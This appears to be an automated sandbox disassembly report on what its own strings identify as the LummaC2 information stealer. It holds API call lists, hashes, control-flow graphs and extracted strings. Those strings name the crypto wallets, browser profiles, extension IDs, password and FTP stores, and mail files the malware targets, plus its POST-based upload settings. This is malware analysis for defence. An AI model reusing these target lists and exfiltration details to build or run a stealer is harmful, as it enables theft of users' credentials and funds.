Storage\leveldb$aea576xedchknmefphepccio576xednboohckonoeemg$afbc576xedbjpbpfadlkmhm576xedclhkeeodmamcflc$aiifb576xednbfobpmeekiphe576xedeijimdpnlpgpp$amkmj576xedjmmflddogmhpjloim576xedipbofnfjih$bcopg576xedchhojmggmff576xedilplmbdicgaihlkp$bfn576xedaelmomeim576xedhlpmgjnjophhpkkoljpa$bhgho576xedamapcdpbohphigoo576xedoaddinpkbai$bln576xedieiiffboi576xedllknjnepogjhkgnoapac$cihm576xedoadaighcej576xedopammfbmddcmdekcje$cj576xedelfplplebdjjenllpjcbl576xedmjkfcffne$cnma576xedmaachppnkjgnil576xeddpdmkaakejnhae$cphhlg576xedmgameodnhkjdmkpa576xednlelnlohao$dkded576xedlpgdmmkkfjabffeg576xedanieamfklkm$dmkam576xedcknogkgcdfhhbddcghach576xedkejeap$ejbalbako576xedplchlghecda576xedlmeeeajnimhm$ffn576xedbelfdoeiohenk576xedjibnmadjiehjhajb$fhbohimaelboh576xedpjbbldcngcnapn576xeddodjp$fhmfend576xedgdocmcbmfikdcog576xedofphimnkno$fihka576xedkfobkmkjojpchpf576xedgcmhfjnmnfpi$flpici576xedilemghbmfalica576xedjoolhkkenfel$fnjhmkhhmkb576xedjkkabndcn576xednogagogbneec$gae576xeddmjdfmmahhbj576xedefcbgaolhhanlaolb$hcflp576xedincpppdclinealmandi576xedjcmnkbgn$hnfanknocfe576xedofbddgcijnm576xedhnfnkdnaad$hpg576xedlfhgfnhbgpjden576xedjgmdgoeiappafln$iW576xedlt$ibnejdfjmmk576xedpcnlpebklmnk576xedoeoihofec$ijmp576xedgkjfkbfho576xedebgogflfebnmejmfbml$ilgcn576xedhelpchnceeipipij576xedaljkblbcobl$imloif576xedkgjagghnncjkhgg576xeddhalmcnfklk$infe576xedboajgfhgbjpjbeppbkg576xednabfdkdaf$jbd576xedaocneiiinmjbj576xedlgalhcelgbejmnid$jojhf576xedeoedkpkglbfimdfabp576xeddfjaoolaf$kkpllko576xeddjeloidieedojogacfhp576xedaihoh$kln576xedaejjgbibmhlephnh576xedpmaofohgkpgkd$kn576xedcchdigobgh576xedenbbaddojjnnaogfppfj$kpfop576xedkelmapcoipemfend576xedmdcghnegimn$lkcjl576xednjfpbikmcm576xedbachjpdbijejflpcm$lodccj576xedjbdhfakaekdiahmedf576xedbieldgik$mnfif576xedefkajgofkcjkemidiae576xedcocnkjeh$nanj576xedmdknhkinifnkgdcggcfnhd576xedaammmj$nhnk576xedbkgjikgcigadomkph576xedalanndcapjk$nkbihfbeo576xedgaeaoehlef576xednkodbefgpgknn$nkd576xeddgncdjgjfcddamfg576xedcmfnlhccnimig$nknhi576xedehlklippafakaeklbegl576xedecifhad$nlbm576xednnijcnlegkjjpcfjclm576xedcfggfefdm$nlgbh576xeddfgdhgbiamfdfmb576xedikcdghidoadd$oel576xedjdldpnmdbchonieli576xeddgobddffflal$onof576xedpnbbkehpmmoa576xedbgpcpmigafmmnjhl$ookjlb576xedkiijinhpmnjffcofj576xedonbfbgaoc$ppbibelpc576xedjmhbdihakflkd576xedcoccbgbkpo
                                                          • API String ID: 4038537762-1377293222
                                                          • Opcode ID: d76d7c670001a5dbd7c9de7b01bcafc77f6a8fb9cd7de87a96b03e98a683fc98
                                                          • Instruction ID: d3b4c8d05487b98e51841e16d8283d2e4e5c243acd67d22c1ca68150be5d60ea
                                                          • Opcode Fuzzy Hash: d76d7c670001a5dbd7c9de7b01bcafc77f6a8fb9cd7de87a96b03e98a683fc98
                                                          • Instruction Fuzzy Hash: 05E229F2E001065AEF2896588D8357F7969EB14304F25453FF80AF63D1EA3C8E558A9F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $jRk$%appd576xedata%\El576xedectrum\wal576xedlets$%appd576xedata%\Ethe576xedreum$%appd576xedata%\Op576xedera Softw576xedare\Op576xedera GX Sta576xedble$%appd576xedata%\Ope576xedra Soft576xedware\Op576xedera Sta576xedble$%appda576xedta%\Bina576xednce$%appda576xedta%\Mo576xedzilla\Fir576xedefox\Prof576xediles$%appda576xedta%\Op576xedera Softwa576xedre\Op576xedera Neo576xedn\Us576xeder Da576xedta$%appdata%\AnyDesk$%appdata%\Authy Desktop\Local Storage\leveldb$%appdata%\Bitcoin\wallets$%appdata%\Electrum\wallets$%appdata%\Exodus\exodus.wallet$%appdata%\FileZilla$%appdata%\Ledger Live$%appdata%\Telegram Desktop$%appdata%\atomic\Local Storage\leveldb$%appdata%\com.liberty.jaxx\IndexedDB$%lo576xedcalapp576xeddata%\Go576xedogle\Chr576xedome\Us576xeder Dat576xeda$%loc576xedalappda576xedta%\Kom576xedeta\Us576xeder Da576xedta$%locala576xedppdata%\Mic576xedrosoft\Edge\Us576xeder Data$%localappdata%\BraveSoftware\Brave-Browser\User Data$%localappdata%\Chro576xedmium\Use576xedr Data$%localappdata%\CocCoc\Browser\User Data$%localappdata%\Coinomi\Coinomi\wallets$%localappdata%\Comodo\Dragon\User Data$%programfiles%\Steam$%programfiles%\Steam\config$%userpro576xedfile%$%userprofile%$*.576xedtxt$*.conf$*.kbdx$*.leveldb$*576xed$.fin576xedger-pr576xedint.fp$?$@an($Aan($Aan($Applications/AnyDesk$Applications/FileZilla$Applications/KeePass$Applications/Steam$Applications/Steam/config$Applications/Telegram$Brave Software$Chr576xedome$Chromi576xedum$CocCoc$Comodo$Ed576xedge$Import576xedant File576xeds/Pro576xedfile$Kom576xedeta$Mozi576xedlla Firef576xedox$Op576xedera G576xedX Stab576xedle$Op576xedera Neo576xedn$Op576xedera Sta576xedble$ST4$TT4$TT4$Wal576xedlets/Bi576xednance$Wal576xedlets/Bin576xedance$Wall576xedets/Binan576xedce$Wall576xedets/Ele576xedctrum$Wall576xedets/Eth576xedereum$Wallets/Atomic$Wallets/Authy Desktop$Wallets/Bitcoin core$Wallets/Coinomi$Wallets/Electrum$Wallets/Exodus$Wallets/JAXX New Version$Wallets/Ledger Live$ap576xedp-sto576xedre.js576xedon$keyst576xedore$q7 C$recentservers.xml$sim576xedple-sto576xedrage.j576xedson$sitemanager.xml$ssfn*$y_B>
                                                          • API String ID: 0-3008219856
                                                          • Opcode ID: 89aa1017212fee1e620a7fbe6eb5b8cc1132262bae267c9db256cfec3297b749
                                                          • Instruction ID: b823253c8ecb5ad27e2b287cb1dce7157abede6b904688f5b513f038bfe6f5bb
                                                          • Opcode Fuzzy Hash: 89aa1017212fee1e620a7fbe6eb5b8cc1132262bae267c9db256cfec3297b749
                                                          • Instruction Fuzzy Hash: 71C207B1F002299BCF249B9AED4297E7970AB14300FE4453BE015FB391E67D89518B9F
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen$CallbackDevicesDispatcherDisplayEnumUser
                                                          • String ID: Ver$$jRk$%s (%d.%d.%d)$- CP576xedU Name: $- HW576xedID: $- Phys576xedical Ins576xedtalled Memor576xedy: $- Screen Resoluton: $4jn`$4jn`$Aan($C: $GhYuIq$LID(Lu576xedmma ID): $Lum576xedmaC2, Build 20233101$Syste576xedm.txt$TT4$advapi32.dll$kernel32.dll$n._$n: $o._$o._$p7 C$q7 C$sion$user32.dll$x_B>$y_B>$y_B>
                                                          • API String ID: 3760342818-3740799521
                                                          • Opcode ID: 6304991c9ea5481c71fa155e6c83a9424bd06b545788eb0206d9441cc2e12171
                                                          • Instruction ID: 1dd07344ff1857ff55ac4e32df16f8dea444b4f0229405df86b90c0a9d587245
                                                          • Opcode Fuzzy Hash: 6304991c9ea5481c71fa155e6c83a9424bd06b545788eb0206d9441cc2e12171
                                                          • Instruction Fuzzy Hash: 710304B1504B419BDB349F29C88162BB7E0EB59310F24E92FE09BDB751D678E841CB1B
                                                          APIs
                                                          • lstrcmpW.KERNEL32(?,0045FD9A), ref: 0040C3B1
                                                          • lstrcatW.KERNEL32(?,?), ref: 0040C427
                                                          • lstrcatW.KERNEL32(?,0045E148), ref: 0040C431
                                                          • lstrlenW.KERNEL32(?), ref: 0040C581
                                                          • lstrcmpW.KERNEL32(?,0045FD96), ref: 0040C8D4
                                                          • lstrlenW.KERNEL32(00001A2F), ref: 0040C901
                                                          • lstrlenW.KERNEL32(00001A2F), ref: 0040D826
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$lstrcatlstrcmp
                                                          • String ID: "B!H$"B!H$K2&e$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$L2&e$L2&e$LOCK$Y[[T$\??\$bi$kernel32.dll$ntdll.dll${#9${#9$Y=`$Y=`
                                                          • API String ID: 156957741-3266097529
                                                          • Opcode ID: 586842b40f5e22ce16161be6ee07f9eaddf4cb437a7acc71fa442095b329c1f4
                                                          • Instruction ID: 88d54f90e21775ceda28cbcef53f0ea71a711b7076ec2cdd820ba9bac023bc57
                                                          • Opcode Fuzzy Hash: 586842b40f5e22ce16161be6ee07f9eaddf4cb437a7acc71fa442095b329c1f4
                                                          • Instruction Fuzzy Hash: 3CF2D4B2D002198BDF249F9888856BEB674EF54700F24453BE516FB3E0D7788A458B9F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "w$ "w$EeS$EeS$EeS$JI3i$KI3i$KI3i$VL6T$VL6T$_m.Q$_m.Q$eo>w$fo>w$fo>w$mNA/
                                                          • API String ID: 0-3469262258
                                                          • Opcode ID: 4c97abe84ae84427aa405d53373a48c981ee8d0905f9e59dac9583b8261a3c6c
                                                          • Instruction ID: 53dd30e2529ea33158ec6446975a809713fb297dce848eb7333cd10e9ac2b658
                                                          • Opcode Fuzzy Hash: 4c97abe84ae84427aa405d53373a48c981ee8d0905f9e59dac9583b8261a3c6c
                                                          • Instruction Fuzzy Hash: 8303F8B1E101298BCF28DB58D9856BEB7B5AB24300F64052FD415EB360D378CD868B9F
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,C0E8A4B4), ref: 0040E55B
                                                          • lstrcatW.KERNEL32(?,0045E102), ref: 0040E565
                                                          • lstrcatW.KERNEL32(?,00000000), ref: 0040E7C3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: !t8$"t8$"t8$(lu$)lu$)lu$Ied|$Ied|$Pz#$Pz#$kernel32.dll$n_v$n_v$u2B$v2B$v2B
                                                          • API String ID: 4038537762-116603239
                                                          • Opcode ID: 5f5454dea047060e7ff4f480129c095d36c38d2fd596d62002e34f1b36a12152
                                                          • Instruction ID: 646d9296649b4045bfdf79ba54957bdd15b6ad44c11c2f08f05c5713f927cd51
                                                          • Opcode Fuzzy Hash: 5f5454dea047060e7ff4f480129c095d36c38d2fd596d62002e34f1b36a12152
                                                          • Instruction Fuzzy Hash: B6E2ECB1D001199BDF24CB9989456BEBA71BB14304F24093BE506FF3D1D3798A92CB9B
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00430F45
                                                          • GetProcessHeap.KERNEL32 ref: 004314B2
                                                          • HeapAlloc.KERNEL32(?,00000008,00000028), ref: 004314EB
                                                          • GetDIBits.GDI32(?,00000001,00000000,?,?,00000001,00000000), ref: 004321FA
                                                          • ReleaseDC.USER32(00000000,?), ref: 00432204
                                                          • GetProcessHeap.KERNEL32 ref: 004326F0
                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 004326FF
                                                          • GetProcessHeap.KERNEL32 ref: 00432701
                                                          • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00432708
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Process$Free$AllocAllocateBitsRelease
                                                          • String ID: $jRk$?$TT4$TT4$q7 C$q7 C$y_B>$y_B>
                                                          • API String ID: 2023195035-2600574631
                                                          • Opcode ID: 5178d04942d301932e8b90fcb8df29a441936fb4bdecd8d5e545f1f0f99eb8d3
                                                          • Instruction ID: 86873c67e1170f8f17d23c3501641da2f07f81d3ce14e24acfbd45c3e0a97cea
                                                          • Opcode Fuzzy Hash: 5178d04942d301932e8b90fcb8df29a441936fb4bdecd8d5e545f1f0f99eb8d3
                                                          • Instruction Fuzzy Hash: 1FC2D771E001198BDF28CF98C9926BEB6B0AF5C314F24252BD515EB360D7789E41CB9B
                                                          APIs
                                                          • wsprintfW.USER32 ref: 004346DB
                                                          • RegEnumKeyExW.KERNELBASE(?,?,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00434725
                                                          • RegCloseKey.KERNELBASE(?), ref: 0043475B
                                                          • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,?,00000001), ref: 00434DA5
                                                          • RegCloseKey.ADVAPI32(?,00000001), ref: 00434F17
                                                          • RegCloseKey.ADVAPI32(?,00000001), ref: 00434F76
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close$EnumOpenwsprintf
                                                          • String ID: $jRk$$jRk$%s%s$%s\%s$?$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$Software.txt$TT4$TT4$y_B>$y_B>
                                                          • API String ID: 44529101-205855365
                                                          • Opcode ID: dfa5f994e76983f3f8c4cf4d5fb617366fdece3346ca8abc111b64aa0c8d78cd
                                                          • Instruction ID: 3b7421bd9f904e401ff100dd7efef49cd6fe7be7401ce4d7a99a7b86551d2639
                                                          • Opcode Fuzzy Hash: dfa5f994e76983f3f8c4cf4d5fb617366fdece3346ca8abc111b64aa0c8d78cd
                                                          • Instruction Fuzzy Hash: E2621D70E002198BDF28CB9899455FEB674BF9C318F242517E625EB360D73CAD418B9B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: %appdata%\The Bat!$%localappdata%\The Bat!$(lu$)lu$*.ABD$*.EML$*.FLX$*.HBI$*.MSB$*.MSG$*.TBB$*.TBK$*.TBN$*.mbox$*.txt$Mail Clients\The Bat\AppData$Mail Clients\The Bat\Local$kernel32.dll$n_v$n_v
                                                          • API String ID: 4038537762-373908387
                                                          • Opcode ID: 9865856486611794f12a139d77c18e5c05c58a82ffa741dd00c0f22e25a9caec
                                                          • Instruction ID: 4f92dd08cf156959b88a3ca31d79465b6333db6cd064390b28fe5485dbf8b601
                                                          • Opcode Fuzzy Hash: 9865856486611794f12a139d77c18e5c05c58a82ffa741dd00c0f22e25a9caec
                                                          • Instruction Fuzzy Hash: 7042D7F1E0012A9BCF149A55AC5667F7B74EB51304FA8052BE405FA3A1E338CA5187DF

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 4851 405aaa-405ac0 4852 405ac3 4851->4852 4853 405ac9-405ad1 4852->4853 4854 405ad3-405ad8 4853->4854 4855 405b3c-405b41 4853->4855 4858 405ade-405ae3 4854->4858 4859 405b7f-405b84 4854->4859 4856 405b43-405b48 4855->4856 4857 405bbb-405bc0 4855->4857 4862 405c2e-405c33 4856->4862 4863 405b4e-405b53 4856->4863 4860 405ca3-405ca8 4857->4860 4861 405bc6-405bcb 4857->4861 4866 405ae9-405aee 4858->4866 4867 405bfd-405c02 4858->4867 4864 405c54-405c59 4859->4864 4865 405b8a-405b8f 4859->4865 4870 405e71-405e76 4860->4870 4871 405cae-405cb3 4860->4871 4868 405bd1-405bd6 4861->4868 4869 405dab-405db0 4861->4869 4876 405e15-405e1a 4862->4876 4877 405c39-405c3e 4862->4877 4872 405d22-405d27 4863->4872 4873 405b59-405b5e 4863->4873 4880 405e3d-405e42 4864->4880 4881 405c5f-405c64 4864->4881 4878 405d74-405d79 4865->4878 4879 405b95-405b9a 4865->4879 4882 405af4-405af9 4866->4882 4883 405ce5-405cea 4866->4883 4874 405dc6-405dcb 4867->4874 4875 405c08-405c0d 4867->4875 4884 405bdc-405be1 4868->4884 4885 405fcd-405fda 4868->4885 4888 4060a2-4060b3 4869->4888 4889 405db6-405dbb 4869->4889 4904 405e7c-405e81 4870->4904 4905 40617d-406197 call 4052a1 4870->4905 4906 405cb9-405cbe 4871->4906 4907 40602c-40604e 4871->4907 4914 406077-40608c 4872->4914 4915 405d2d-405d32 4872->4915 4908 405b64-405b69 4873->4908 4909 405f1c-405f5c call 404edc call 4048e2 4873->4909 4892 405dd1-405dd6 4874->4892 4893 4060c3-4060dd 4874->4893 4890 405c13-405c18 4875->4890 4891 405fdf-406009 4875->4891 4896 405e20-405e25 4876->4896 4897 4060e6 4876->4897 4894 405c44-405c49 4877->4894 4895 406018-406027 lstrcatW 4877->4895 4886 406091-40609d 4878->4886 4887 405d7f-405d84 4878->4887 4912 405fa0-405fc8 call 404988 4879->4912 4913 405ba0-405ba5 4879->4913 4902 405e48-405e4d 4880->4902 4903 4060fe-406109 4880->4903 4898 405c6a-405c6f 4881->4898 4899 40615f-406166 call 447047 4881->4899 4900 405ebc-405ee8 lstrcatW call 4360e1 lstrcatW * 2 4882->4900 4901 405aff-405b04 4882->4901 4910 405cf0-405cf5 4883->4910 4911 406059-406070 4883->4911 4884->4853 4933 405be7-405bf8 lstrcatW 4884->4933 4885->4853 4886->4853 4887->4853 4916 405d8a-405d9b 4887->4916 4946 406157-40615a 4888->4946 4947 4060b9-4060be 4888->4947 4919 405dc1 4889->4919 4920 406115-406129 4889->4920 4890->4853 4934 405c1e-405c29 4890->4934 4938 406010-406013 4891->4938 4939 40600b 4891->4939 4892->4853 4921 405ddc-405e05 4892->4921 4944 4060df-4060e4 4893->4944 4893->4946 4936 40619c-4061d6 call 4038d5 call 403a1c 4894->4936 4937 405c4f 4894->4937 4895->4853 4896->4853 4922 405e2b-405e38 4896->4922 4949 4060e7 4897->4949 4898->4853 4940 405c75-405c93 call 403600 4898->4940 4954 40616b-406178 4899->4954 4900->4853 4923 405b0a-405b0f 4901->4923 4924 405eed-405f17 lstrcatW call 4360e1 lstrcatW * 2 4901->4924 4902->4853 4925 405e53-405e5a call 447047 4902->4925 4931 40612e-406150 4903->4931 4950 40610b-406113 4903->4950 4904->4853 4926 405e87-405eac 4904->4926 4905->4853 4906->4853 4945 405cc4-405ce0 4906->4945 4941 406152 4907->4941 4942 406054 4907->4942 4927 405f6c-405f90 call 403600 4908->4927 4928 405b6f-405b74 4908->4928 4909->4946 4987 405f62-405f67 4909->4987 4910->4853 4948 405cfb-405d13 call 403e03 4910->4948 4943 406072 4911->4943 4911->4944 4912->4853 4930 405bab-405bb0 4913->4930 4913->4931 4914->4853 4915->4853 4951 405d38-405d64 4915->4951 4916->4946 4953 405da1-405da6 4916->4953 4919->4853 4920->4853 4921->4938 4957 405e0b-405e10 4921->4957 4922->4853 4923->4853 4958 405b11-405b31 4923->4958 4924->4853 4973 405e5f-405e6c 4925->4973 4926->4946 4960 405eb2-405eb7 4926->4960 4927->4946 4983 405f96-405f9b 4927->4983 4961 405d16-405d1d 4928->4961 4962 405b7a 4928->4962 4930->4853 4965 405bb6-40620a call 4360e1 call 40e14e 4930->4965 4931->4941 4931->4946 4933->4853 4934->4853 4988 4061d8 4936->4988 4989 4061dd-4061e0 4936->4989 4937->4853 4938->4853 4939->4938 4940->4946 4984 405c99-405c9e 4940->4984 4941->4946 4942->4946 4943->4946 4944->4946 4945->4853 4946->4853 4947->4946 4948->4961 4949->4949 4950->4899 4950->4920 4951->4938 4952 405d6a-405d6f 4951->4952 4952->4938 4953->4946 4954->4853 4957->4938 4958->4944 4972 405b37 4958->4972 4960->4946 4961->4853 4962->4853 4972->4946 4973->4853 4983->4946 4984->4946 4987->4946 4988->4989 4989->4852
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,0045E102,?,?,00000000,?,?,004058C6), ref: 00405BEF
                                                          • lstrcatW.KERNEL32(00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405EC4
                                                          • lstrcatW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405ED7
                                                          • lstrcatW.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,004058C6), ref: 00405EDF
                                                          • lstrcatW.KERNEL32(?,?,?,?,?,00000000,?,?,004058C6), ref: 00405EF3
                                                          • lstrcatW.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405F06
                                                          • lstrcatW.KERNEL32(?,84D55917,?,?,?,?,00000000,?,?,004058C6), ref: 00405F0E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: *576xed$,$/Ext576xedensio576xedns/$\Loc576xedal Extens576xedion Settin576xedgs\$n_v$n_v
                                                          • API String ID: 4038537762-1578839816
                                                          • Opcode ID: c0ae44d74d2992532015a5b165d06f1b6e1b0c53f96b55d44899152aba16d5ae
                                                          • Instruction ID: e5bf92a8c3e4632e865b489cc3d7c979cf6fee557c11a145fed96966642f9e4d
                                                          • Opcode Fuzzy Hash: c0ae44d74d2992532015a5b165d06f1b6e1b0c53f96b55d44899152aba16d5ae
                                                          • Instruction Fuzzy Hash: 5FF1F9B1D006198BCF28DB98889657FBA74EB44300F25463BE506FA3D1D73C9A518F9B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 9a%^$9a%^$9a%^$9a%^$Content-Type: multipart/form-data; boundary=%s$L%$M%$M%$POST$SqDe87817huf871793q74$TeslaBrowser/5.5$winhttp.dll
                                                          • API String ID: 0-485045143
                                                          • Opcode ID: 93238ce1bce5d0f96e870d474ccd94fa1ee818516e10118a3e8a746afefe7c00
                                                          • Instruction ID: c94fe321a93857c184b0378d7fc968df2dfc5883700fbc77eb7b7d771d47b6e9
                                                          • Opcode Fuzzy Hash: 93238ce1bce5d0f96e870d474ccd94fa1ee818516e10118a3e8a746afefe7c00
                                                          • Instruction Fuzzy Hash: 73521DB1E802058BDF288EE89CC56FE7AA1AB58304F24052BE515E6390D77CCDC1979F

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5374 40620b-406227 5375 40622d-406235 5374->5375 5376 406237-40623c 5375->5376 5377 40627e-406283 5375->5377 5378 406242-406247 5376->5378 5379 4062ef-4062f4 5376->5379 5380 406289-40628e 5377->5380 5381 40633e-406343 5377->5381 5384 4063e7-4063ec 5378->5384 5385 40624d-406252 5378->5385 5382 406431-406436 5379->5382 5383 4062fa-4062ff 5379->5383 5388 406294-406299 5380->5388 5389 40639b-4063a0 5380->5389 5386 406462-406467 5381->5386 5387 406349-40634e 5381->5387 5402 406615-40661a 5382->5402 5403 40643c-406441 5382->5403 5394 406305-40630a 5383->5394 5395 406596-40659b 5383->5395 5398 4065e1-4065e6 5384->5398 5399 4063f2-4063f7 5384->5399 5396 406543-406548 5385->5396 5397 406258-40625d 5385->5397 5390 40664c-406651 5386->5390 5391 40646d-406472 5386->5391 5400 406354-406359 5387->5400 5401 40648f-406494 5387->5401 5404 4064df-4064e4 5388->5404 5405 40629f-4062a4 5388->5405 5392 406521-406526 5389->5392 5393 4063a6-4063ab 5389->5393 5414 406845-40686e 5390->5414 5415 406657-40665c 5390->5415 5406 406478-40647d 5391->5406 5407 40668f-4066a9 5391->5407 5420 406683-40668a 5392->5420 5421 40652c-406531 5392->5421 5422 4063b1-4063b6 5393->5422 5423 4067b2-4067d4 5393->5423 5410 406310-406315 5394->5410 5411 4064c4-4064c7 5394->5411 5430 406750-406762 call 447a80 5395->5430 5431 4065a1-4065a6 5395->5431 5424 40671a-406740 5396->5424 5425 40654e-406553 5396->5425 5426 406263-406268 5397->5426 5427 4067e4-4067fd call 447047 5397->5427 5434 406767-40676e 5398->5434 5435 4065ec-4065f1 5398->5435 5428 406802-40680d lstrcatW call 40b7bb 5399->5428 5429 4063fd-406402 5399->5429 5416 4066f7-406715 5400->5416 5417 40635f-406364 5400->5417 5412 40649a-40649f 5401->5412 5413 4066ae-4066d0 5401->5413 5408 406620-406625 5402->5408 5409 406773-406784 lstrcatW 5402->5409 5432 406825-406840 call 419e6b 5403->5432 5433 406447-40644c 5403->5433 5418 4066e0-4066f2 call 447a80 5404->5418 5419 4064ea-4064ef 5404->5419 5436 406789-4067ad call 404822 5405->5436 5437 4062aa-4062af 5405->5437 5460 406483-40648a 5406->5460 5461 40695b-406960 5406->5461 5407->5375 5408->5375 5438 40662b-40663c 5408->5438 5409->5375 5439 4068f5-406913 5410->5439 5440 40631b-406320 5410->5440 5466 4064c8 5411->5466 5412->5375 5463 4064a5-4064b0 5412->5463 5443 4066d6-4066db 5413->5443 5444 40691a-40691d 5413->5444 5464 406870 5414->5464 5465 406875-406878 5414->5465 5441 406662-40667e lstrcatW * 2 5415->5441 5442 406968-40696d 5415->5442 5416->5375 5445 40636a-40636f 5417->5445 5446 40687d-4068ac call 404a00 5417->5446 5418->5375 5419->5375 5467 4064f5-40651a 5419->5467 5420->5375 5421->5375 5468 406537-40653e 5421->5468 5449 4068c1-4068c7 5422->5449 5450 4063bc-4063c1 5422->5450 5423->5444 5455 4067da-4067df 5423->5455 5424->5444 5448 406746-40674b 5424->5448 5425->5375 5469 406559-406586 call 403ac1 call 404f5e 5425->5469 5470 4068d9-4068ec call 403c98 5426->5470 5471 40626e-406273 5426->5471 5427->5375 5487 406812-40681c 5428->5487 5452 406922-406943 lstrcatW * 2 5429->5452 5453 406408-40640d 5429->5453 5430->5375 5431->5375 5472 4065ac-4065d1 5431->5472 5432->5375 5457 406452-406457 5433->5457 5458 406948-406956 5433->5458 5434->5375 5435->5375 5473 4065f7-406610 call 447047 5435->5473 5436->5375 5474 4068b5-4068bc 5437->5474 5475 4062b5-4062ba 5437->5475 5438->5444 5476 406642-406647 5438->5476 5439->5444 5495 406915 5439->5495 5440->5375 5477 406326-406339 5440->5477 5441->5375 5442->5375 5499 406973-406991 call 404c9c 5442->5499 5443->5444 5444->5375 5445->5375 5478 406375-406387 call 40b129 5445->5478 5446->5444 5513 4068ae-4068b3 5446->5513 5448->5444 5485 4068cd-4068d4 5449->5485 5450->5375 5480 4063c7-4063d7 5450->5480 5452->5375 5453->5375 5482 406413-40642c lstrcatW * 2 5453->5482 5455->5444 5457->5485 5486 40645d 5457->5486 5458->5375 5460->5375 5461->5375 5497 406966 5461->5497 5463->5472 5489 4064b6-4064be 5463->5489 5464->5465 5465->5375 5466->5466 5491 40658c-406591 5467->5491 5492 40651c 5467->5492 5468->5375 5469->5444 5469->5491 5470->5444 5514 4068ee-4068f3 5470->5514 5471->5375 5496 406275-40627c 5471->5496 5472->5444 5498 4065d7-4065dc 5472->5498 5473->5375 5474->5375 5475->5375 5501 4062c0-4062e4 5475->5501 5476->5444 5477->5375 5512 40638c-406396 5478->5512 5480->5444 5504 4063dd-4063e2 5480->5504 5482->5375 5485->5375 5486->5375 5487->5465 5506 40681e-406823 5487->5506 5489->5411 5489->5420 5491->5444 5492->5444 5495->5444 5496->5375 5510 406996-4069a0 5497->5510 5498->5444 5499->5510 5503 4062ea 5501->5503 5501->5504 5503->5444 5504->5444 5506->5465 5512->5375 5513->5444 5514->5444
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,0045E102), ref: 0040641B
